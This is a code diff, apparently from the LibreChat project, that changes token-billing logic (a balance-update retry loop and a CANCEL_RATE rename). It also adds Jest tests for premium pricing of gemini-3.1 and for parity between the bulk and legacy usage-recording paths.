// --- Document Does Not Exist: Perform Conditional Upsert ---
|
|
||||||
// Try to insert the document, but only if it still doesn't exist.
|
|
||||||
// Using tokenCredits: {$exists: false} helps prevent race conditions where
|
|
||||||
// another process creates the doc between our findOne and findOneAndUpdate.
|
|
||||||
try {
|
|
||||||
updatedBalance = await Balance.findOneAndUpdate(
|
|
||||||
{
|
|
||||||
user: user,
|
|
||||||
// Attempt to match only if the document doesn't exist OR was just created
|
|
||||||
// without tokenCredits (less likely but possible). A simple { user } filter
|
|
||||||
// might also work, relying on the retry for conflicts.
|
|
||||||
// Let's use a simpler filter and rely on retry for races.
|
|
||||||
// tokenCredits: { $exists: false } // This condition might be too strict if doc exists with 0 credits
|
|
||||||
},
|
|
||||||
updatePayload,
|
|
||||||
{
|
|
||||||
upsert: true, // Create if doesn't exist
|
|
||||||
new: true, // Return the created/updated document
|
|
||||||
// setDefaultsOnInsert: true, // Ensure schema defaults are applied on insert
|
|
||||||
// lean: true,
|
|
||||||
},
|
|
||||||
).lean();
|
|
||||||
|
|
||||||
if (updatedBalance) {
|
|
||||||
// Upsert succeeded (likely created the document)
|
|
||||||
return updatedBalance;
|
|
||||||
}
|
|
||||||
// If null, potentially a rare race condition during upsert. Retry should handle it.
|
|
||||||
lastError = new Error(
|
|
||||||
`Upsert race condition suspected for user ${user} on attempt ${attempt}.`,
|
|
||||||
);
|
|
||||||
} catch (error) {
|
|
||||||
if (error.code === 11000) {
|
|
||||||
// E11000 duplicate key error on index
|
|
||||||
// This means another process created the document *just* before our upsert.
|
|
||||||
// It's a concurrency conflict during creation. We should retry.
|
|
||||||
lastError = error; // Store the error
|
|
||||||
// Proceed to retry logic below.
|
|
||||||
} else {
|
|
||||||
// Different error, rethrow
|
|
||||||
throw error;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
} // End if/else (document exists?)
|
|
||||||
} catch (error) {
|
|
||||||
// Catch errors from findOne or unexpected findOneAndUpdate errors
|
|
||||||
logger.error(`[updateBalance] Error during attempt ${attempt} for user ${user}:`, error);
|
|
||||||
lastError = error; // Store the error
|
|
||||||
// Consider stopping retries for non-transient errors, but for now, we retry.
|
|
||||||
}
|
|
||||||
|
|
||||||
// If we reached here, it means the update failed (conflict or error), wait and retry
|
|
||||||
if (attempt < maxRetries) {
|
|
||||||
const jitter = Math.random() * delay * 0.5; // Add jitter to delay
|
|
||||||
await new Promise((resolve) => setTimeout(resolve, delay + jitter));
|
|
||||||
delay = Math.min(delay * 2, 2000); // Exponential backoff with cap
|
|
||||||
}
|
|
||||||
} // End for loop (retries)
|
|
||||||
|
|
||||||
// If loop finishes without success, throw the last encountered error or a generic one
|
|
||||||
logger.error(
|
|
||||||
`[updateBalance] Failed to update balance for user ${user} after ${maxRetries} attempts.`,
|
|
||||||
);
|
|
||||||
throw (
|
|
||||||
lastError ||
|
|
||||||
new Error(
|
|
||||||
`Failed to update balance for user ${user} after maximum retries due to persistent conflicts.`,
|
|
||||||
)
|
|
||||||
);
|
|
||||||
};
|
|
||||||
|
|
||||||
/** Method to calculate and set the tokenValue for a transaction */
|
/** Method to calculate and set the tokenValue for a transaction */
|
||||||
function calculateTokenValue(txn) {
|
function calculateTokenValue(txn) {
|
||||||
|
|
@ -145,8 +12,8 @@ function calculateTokenValue(txn) {
|
||||||
txn.rate = multiplier;
|
txn.rate = multiplier;
|
||||||
txn.tokenValue = txn.rawAmount * multiplier;
|
txn.tokenValue = txn.rawAmount * multiplier;
|
||||||
if (txn.context && txn.tokenType === 'completion' && txn.context === 'incomplete') {
|
if (txn.context && txn.tokenType === 'completion' && txn.context === 'incomplete') {
|
||||||
txn.tokenValue = Math.ceil(txn.tokenValue * cancelRate);
|
txn.tokenValue = Math.ceil(txn.tokenValue * CANCEL_RATE);
|
||||||
txn.rate *= cancelRate;
|
txn.rate *= CANCEL_RATE;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -321,11 +188,11 @@ function calculateStructuredTokenValue(txn) {
|
||||||
}
|
}
|
||||||
|
|
||||||
if (txn.context && txn.tokenType === 'completion' && txn.context === 'incomplete') {
|
if (txn.context && txn.tokenType === 'completion' && txn.context === 'incomplete') {
|
||||||
txn.tokenValue = Math.ceil(txn.tokenValue * cancelRate);
|
txn.tokenValue = Math.ceil(txn.tokenValue * CANCEL_RATE);
|
||||||
txn.rate *= cancelRate;
|
txn.rate *= CANCEL_RATE;
|
||||||
if (txn.rateDetail) {
|
if (txn.rateDetail) {
|
||||||
txn.rateDetail = Object.fromEntries(
|
txn.rateDetail = Object.fromEntries(
|
||||||
Object.entries(txn.rateDetail).map(([k, v]) => [k, v * cancelRate]),
|
Object.entries(txn.rateDetail).map(([k, v]) => [k, v * CANCEL_RATE]),
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -1,8 +1,10 @@
|
||||||
const mongoose = require('mongoose');
|
const mongoose = require('mongoose');
|
||||||
|
const { recordCollectedUsage } = require('@librechat/api');
|
||||||
|
const { createMethods } = require('@librechat/data-schemas');
|
||||||
const { MongoMemoryServer } = require('mongodb-memory-server');
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
const { spendTokens, spendStructuredTokens } = require('./spendTokens');
|
|
||||||
const { getMultiplier, getCacheMultiplier, premiumTokenValues, tokenValues } = require('./tx');
|
const { getMultiplier, getCacheMultiplier, premiumTokenValues, tokenValues } = require('./tx');
|
||||||
const { createTransaction, createStructuredTransaction } = require('./Transaction');
|
const { createTransaction, createStructuredTransaction } = require('./Transaction');
|
||||||
|
const { spendTokens, spendStructuredTokens } = require('./spendTokens');
|
||||||
const { Balance, Transaction } = require('~/db/models');
|
const { Balance, Transaction } = require('~/db/models');
|
||||||
|
|
||||||
let mongoServer;
|
let mongoServer;
|
||||||
|
|
@ -823,6 +825,139 @@ describe('Premium Token Pricing Integration Tests', () => {
|
||||||
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedTotalCost, 0);
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedTotalCost, 0);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
test('spendTokens should apply standard pricing for gemini-3.1-pro-preview below threshold', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const promptTokens = 100000;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-below',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
endpointTokenConfig: null,
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
await spendTokens(txData, { promptTokens, completionTokens });
|
||||||
|
|
||||||
|
const standardPromptRate = tokenValues['gemini-3.1'].prompt;
|
||||||
|
const standardCompletionRate = tokenValues['gemini-3.1'].completion;
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * standardPromptRate + completionTokens * standardCompletionRate;
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('spendTokens should apply premium pricing for gemini-3.1-pro-preview above threshold', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const promptTokens = 250000;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-above',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
endpointTokenConfig: null,
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
await spendTokens(txData, { promptTokens, completionTokens });
|
||||||
|
|
||||||
|
const premiumPromptRate = premiumTokenValues['gemini-3.1'].prompt;
|
||||||
|
const premiumCompletionRate = premiumTokenValues['gemini-3.1'].completion;
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * premiumPromptRate + completionTokens * premiumCompletionRate;
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('spendTokens should apply standard pricing for gemini-3.1-pro-preview at exactly the threshold', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const promptTokens = premiumTokenValues['gemini-3.1'].threshold;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-exact',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
endpointTokenConfig: null,
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
await spendTokens(txData, { promptTokens, completionTokens });
|
||||||
|
|
||||||
|
const standardPromptRate = tokenValues['gemini-3.1'].prompt;
|
||||||
|
const standardCompletionRate = tokenValues['gemini-3.1'].completion;
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * standardPromptRate + completionTokens * standardCompletionRate;
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('spendStructuredTokens should apply premium pricing for gemini-3.1 when total input exceeds threshold', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-structured-premium',
|
||||||
|
model,
|
||||||
|
context: 'message',
|
||||||
|
endpointTokenConfig: null,
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
const tokenUsage = {
|
||||||
|
promptTokens: {
|
||||||
|
input: 200000,
|
||||||
|
write: 10000,
|
||||||
|
read: 5000,
|
||||||
|
},
|
||||||
|
completionTokens: 1000,
|
||||||
|
};
|
||||||
|
|
||||||
|
const totalInput =
|
||||||
|
tokenUsage.promptTokens.input + tokenUsage.promptTokens.write + tokenUsage.promptTokens.read;
|
||||||
|
|
||||||
|
await spendStructuredTokens(txData, tokenUsage);
|
||||||
|
|
||||||
|
const premiumPromptRate = premiumTokenValues['gemini-3.1'].prompt;
|
||||||
|
const premiumCompletionRate = premiumTokenValues['gemini-3.1'].completion;
|
||||||
|
const writeMultiplier = getCacheMultiplier({ model, cacheType: 'write' });
|
||||||
|
const readMultiplier = getCacheMultiplier({ model, cacheType: 'read' });
|
||||||
|
|
||||||
|
const expectedPromptCost =
|
||||||
|
tokenUsage.promptTokens.input * premiumPromptRate +
|
||||||
|
tokenUsage.promptTokens.write * writeMultiplier +
|
||||||
|
tokenUsage.promptTokens.read * readMultiplier;
|
||||||
|
const expectedCompletionCost = tokenUsage.completionTokens * premiumCompletionRate;
|
||||||
|
const expectedTotalCost = expectedPromptCost + expectedCompletionCost;
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(totalInput).toBeGreaterThan(premiumTokenValues['gemini-3.1'].threshold);
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedTotalCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
test('non-premium models should not be affected by inputTokenCount regardless of prompt size', async () => {
|
test('non-premium models should not be affected by inputTokenCount regardless of prompt size', async () => {
|
||||||
const userId = new mongoose.Types.ObjectId();
|
const userId = new mongoose.Types.ObjectId();
|
||||||
const initialBalance = 100000000;
|
const initialBalance = 100000000;
|
||||||
|
|
@ -852,3 +987,339 @@ describe('Premium Token Pricing Integration Tests', () => {
|
||||||
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('Bulk path parity', () => {
|
||||||
|
/**
|
||||||
|
* Each test here mirrors an existing legacy test above, replacing spendTokens/
|
||||||
|
* spendStructuredTokens with recordCollectedUsage + bulk deps.
|
||||||
|
* The balance deduction and transaction document fields must be numerically identical.
|
||||||
|
*/
|
||||||
|
let bulkDeps;
|
||||||
|
let methods;
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
methods = createMethods(mongoose);
|
||||||
|
bulkDeps = {
|
||||||
|
spendTokens: () => Promise.resolve(),
|
||||||
|
spendStructuredTokens: () => Promise.resolve(),
|
||||||
|
pricing: { getMultiplier, getCacheMultiplier },
|
||||||
|
bulkWriteOps: {
|
||||||
|
insertMany: methods.bulkInsertTransactions,
|
||||||
|
updateBalance: methods.updateBalance,
|
||||||
|
},
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
|
test('balance should decrease when spending tokens via bulk path', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 10000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'gpt-3.5-turbo';
|
||||||
|
const promptTokens = 100;
|
||||||
|
const completionTokens = 50;
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-conversation-id',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [{ input_tokens: promptTokens, output_tokens: completionTokens, model }],
|
||||||
|
});
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
const promptMultiplier = getMultiplier({
|
||||||
|
model,
|
||||||
|
tokenType: 'prompt',
|
||||||
|
inputTokenCount: promptTokens,
|
||||||
|
});
|
||||||
|
const completionMultiplier = getMultiplier({
|
||||||
|
model,
|
||||||
|
tokenType: 'completion',
|
||||||
|
inputTokenCount: promptTokens,
|
||||||
|
});
|
||||||
|
const expectedTotalCost =
|
||||||
|
promptTokens * promptMultiplier + completionTokens * completionMultiplier;
|
||||||
|
const expectedBalance = initialBalance - expectedTotalCost;
|
||||||
|
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(expectedBalance, 0);
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(2);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path should not update balance when balance.enabled is false', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 10000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'gpt-3.5-turbo';
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-conversation-id',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: false },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [{ input_tokens: 100, output_tokens: 50, model }],
|
||||||
|
});
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(updatedBalance.tokenCredits).toBe(initialBalance);
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(2); // transactions still recorded
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path should not insert when transactions.enabled is false', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 10000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-conversation-id',
|
||||||
|
model: 'gpt-3.5-turbo',
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: false },
|
||||||
|
collectedUsage: [{ input_tokens: 100, output_tokens: 50, model: 'gpt-3.5-turbo' }],
|
||||||
|
});
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(0);
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
expect(balance.tokenCredits).toBe(initialBalance);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path handles incomplete context for completion tokens — same CANCEL_RATE as legacy', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 17613154.55;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'claude-3-5-sonnet';
|
||||||
|
const promptTokens = 10;
|
||||||
|
const completionTokens = 50;
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-convo',
|
||||||
|
model,
|
||||||
|
context: 'incomplete',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [{ input_tokens: promptTokens, output_tokens: completionTokens, model }],
|
||||||
|
});
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
const completionTx = txns.find((t) => t.tokenType === 'completion');
|
||||||
|
const completionMultiplier = getMultiplier({
|
||||||
|
model,
|
||||||
|
tokenType: 'completion',
|
||||||
|
inputTokenCount: promptTokens,
|
||||||
|
});
|
||||||
|
expect(completionTx.tokenValue).toBeCloseTo(-completionTokens * completionMultiplier * 1.15, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path structured tokens — balance deduction matches legacy spendStructuredTokens', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 17613154.55;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'claude-3-5-sonnet';
|
||||||
|
const promptInput = 11;
|
||||||
|
const promptWrite = 140522;
|
||||||
|
const promptRead = 0;
|
||||||
|
const completionTokens = 5;
|
||||||
|
const totalInput = promptInput + promptWrite + promptRead;
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-convo',
|
||||||
|
model,
|
||||||
|
context: 'message',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [
|
||||||
|
{
|
||||||
|
input_tokens: promptInput,
|
||||||
|
output_tokens: completionTokens,
|
||||||
|
model,
|
||||||
|
input_token_details: { cache_creation: promptWrite, cache_read: promptRead },
|
||||||
|
},
|
||||||
|
],
|
||||||
|
});
|
||||||
|
|
||||||
|
const promptMultiplier = getMultiplier({
|
||||||
|
model,
|
||||||
|
tokenType: 'prompt',
|
||||||
|
inputTokenCount: totalInput,
|
||||||
|
});
|
||||||
|
const completionMultiplier = getMultiplier({
|
||||||
|
model,
|
||||||
|
tokenType: 'completion',
|
||||||
|
inputTokenCount: totalInput,
|
||||||
|
});
|
||||||
|
const writeMultiplier = getCacheMultiplier({ model, cacheType: 'write' }) ?? promptMultiplier;
|
||||||
|
const readMultiplier = getCacheMultiplier({ model, cacheType: 'read' }) ?? promptMultiplier;
|
||||||
|
|
||||||
|
const expectedPromptCost =
|
||||||
|
promptInput * promptMultiplier + promptWrite * writeMultiplier + promptRead * readMultiplier;
|
||||||
|
const expectedCompletionCost = completionTokens * completionMultiplier;
|
||||||
|
const expectedTotalCost = expectedPromptCost + expectedCompletionCost;
|
||||||
|
const expectedBalance = initialBalance - expectedTotalCost;
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(Math.abs(updatedBalance.tokenCredits - expectedBalance)).toBeLessThan(100);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('premium pricing above threshold via bulk path — same balance as legacy', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'claude-opus-4-6';
|
||||||
|
const promptTokens = 250000;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-premium',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [{ input_tokens: promptTokens, output_tokens: completionTokens, model }],
|
||||||
|
});
|
||||||
|
|
||||||
|
const premiumPromptRate = premiumTokenValues[model].prompt;
|
||||||
|
const premiumCompletionRate = premiumTokenValues[model].completion;
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * premiumPromptRate + completionTokens * premiumCompletionRate;
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('real-world multi-entry batch: 5 sequential tool calls — same total deduction as 5 legacy spendTokens calls', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
const model = 'claude-opus-4-5-20251101';
|
||||||
|
const calls = [
|
||||||
|
{ input_tokens: 31596, output_tokens: 151 },
|
||||||
|
{ input_tokens: 35368, output_tokens: 150 },
|
||||||
|
{ input_tokens: 58362, output_tokens: 295 },
|
||||||
|
{ input_tokens: 112604, output_tokens: 193 },
|
||||||
|
{ input_tokens: 257440, output_tokens: 2217 },
|
||||||
|
];
|
||||||
|
|
||||||
|
let expectedTotalCost = 0;
|
||||||
|
for (const { input_tokens, output_tokens } of calls) {
|
||||||
|
const pm = getMultiplier({ model, tokenType: 'prompt', inputTokenCount: input_tokens });
|
||||||
|
const cm = getMultiplier({ model, tokenType: 'completion', inputTokenCount: input_tokens });
|
||||||
|
expectedTotalCost += input_tokens * pm + output_tokens * cm;
|
||||||
|
}
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-sequential',
|
||||||
|
model,
|
||||||
|
context: 'message',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: calls.map((c) => ({ ...c, model })),
|
||||||
|
});
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(10); // 5 calls × 2 docs (prompt + completion)
|
||||||
|
|
||||||
|
const updatedBalance = await Balance.findOne({ user: userId });
|
||||||
|
expect(updatedBalance.tokenCredits).toBeCloseTo(initialBalance - expectedTotalCost, 0);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path should save transaction but not update balance when balance disabled, transactions enabled', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 10000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-conversation-id',
|
||||||
|
model: 'gpt-3.5-turbo',
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: false },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [{ input_tokens: 100, output_tokens: 50, model: 'gpt-3.5-turbo' }],
|
||||||
|
});
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(2);
|
||||||
|
expect(txns[0].rawAmount).toBeDefined();
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
expect(balance.tokenCredits).toBe(initialBalance);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path structured tokens should not save when transactions.enabled is false', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 10000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-conversation-id',
|
||||||
|
model: 'claude-3-5-sonnet',
|
||||||
|
context: 'message',
|
||||||
|
balance: { enabled: true },
|
||||||
|
transactions: { enabled: false },
|
||||||
|
collectedUsage: [
|
||||||
|
{
|
||||||
|
input_tokens: 10,
|
||||||
|
output_tokens: 5,
|
||||||
|
model: 'claude-3-5-sonnet',
|
||||||
|
input_token_details: { cache_creation: 100, cache_read: 5 },
|
||||||
|
},
|
||||||
|
],
|
||||||
|
});
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(0);
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
expect(balance.tokenCredits).toBe(initialBalance);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('bulk path structured tokens should save but not update balance when balance disabled', async () => {
|
||||||
|
const userId = new mongoose.Types.ObjectId();
|
||||||
|
const initialBalance = 10000000;
|
||||||
|
await Balance.create({ user: userId, tokenCredits: initialBalance });
|
||||||
|
|
||||||
|
await recordCollectedUsage(bulkDeps, {
|
||||||
|
user: userId.toString(),
|
||||||
|
conversationId: 'test-conversation-id',
|
||||||
|
model: 'claude-3-5-sonnet',
|
||||||
|
context: 'message',
|
||||||
|
balance: { enabled: false },
|
||||||
|
transactions: { enabled: true },
|
||||||
|
collectedUsage: [
|
||||||
|
{
|
||||||
|
input_tokens: 10,
|
||||||
|
output_tokens: 5,
|
||||||
|
model: 'claude-3-5-sonnet',
|
||||||
|
input_token_details: { cache_creation: 100, cache_read: 5 },
|
||||||
|
},
|
||||||
|
],
|
||||||
|
});
|
||||||
|
|
||||||
|
const txns = await Transaction.find({ user: userId }).lean();
|
||||||
|
expect(txns).toHaveLength(2);
|
||||||
|
const promptTx = txns.find((t) => t.tokenType === 'prompt');
|
||||||
|
expect(promptTx.inputTokens).toBe(-10);
|
||||||
|
expect(promptTx.writeTokens).toBe(-100);
|
||||||
|
expect(promptTx.readTokens).toBe(-5);
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
expect(balance.tokenCredits).toBe(initialBalance);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
|
||||||
|
|
@ -48,14 +48,14 @@ const loadAddedAgent = async ({ req, conversation, primaryAgent }) => {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
// If there's an agent_id, load the existing agent
|
|
||||||
if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) {
|
if (conversation.agent_id && !isEphemeralAgentId(conversation.agent_id)) {
|
||||||
|
let agent = req.resolvedAddedAgent;
|
||||||
|
if (!agent) {
|
||||||
if (!getAgent) {
|
if (!getAgent) {
|
||||||
throw new Error('getAgent not initialized - call setGetAgent first');
|
throw new Error('getAgent not initialized - call setGetAgent first');
|
||||||
}
|
}
|
||||||
const agent = await getAgent({
|
agent = await getAgent({ id: conversation.agent_id });
|
||||||
id: conversation.agent_id,
|
}
|
||||||
});
|
|
||||||
|
|
||||||
if (!agent) {
|
if (!agent) {
|
||||||
logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`);
|
logger.warn(`[loadAddedAgent] Agent ${conversation.agent_id} not found`);
|
||||||
|
|
|
||||||
|
|
@ -878,6 +878,135 @@ describe('spendTokens', () => {
|
||||||
expect(result.completion.completion).toBeCloseTo(-expectedCompletionCost, 0);
|
expect(result.completion.completion).toBeCloseTo(-expectedCompletionCost, 0);
|
||||||
});
|
});
|
||||||
|
|
||||||
|
it('should charge standard rates for gemini-3.1-pro-preview when prompt tokens are below threshold', async () => {
|
||||||
|
const initialBalance = 100000000;
|
||||||
|
await Balance.create({
|
||||||
|
user: userId,
|
||||||
|
tokenCredits: initialBalance,
|
||||||
|
});
|
||||||
|
|
||||||
|
const model = 'gemini-3.1-pro-preview';
|
||||||
|
const promptTokens = 100000;
|
||||||
|
const completionTokens = 500;
|
||||||
|
|
||||||
|
const txData = {
|
||||||
|
user: userId,
|
||||||
|
conversationId: 'test-gemini31-standard-pricing',
|
||||||
|
model,
|
||||||
|
context: 'test',
|
||||||
|
balance: { enabled: true },
|
||||||
|
};
|
||||||
|
|
||||||
|
await spendTokens(txData, { promptTokens, completionTokens });
|
||||||
|
|
||||||
|
const expectedCost =
|
||||||
|
promptTokens * tokenValues['gemini-3.1'].prompt +
|
||||||
|
completionTokens * tokenValues['gemini-3.1'].completion;
|
||||||
|
|
||||||
|
const balance = await Balance.findOne({ user: userId });
|
||||||
|
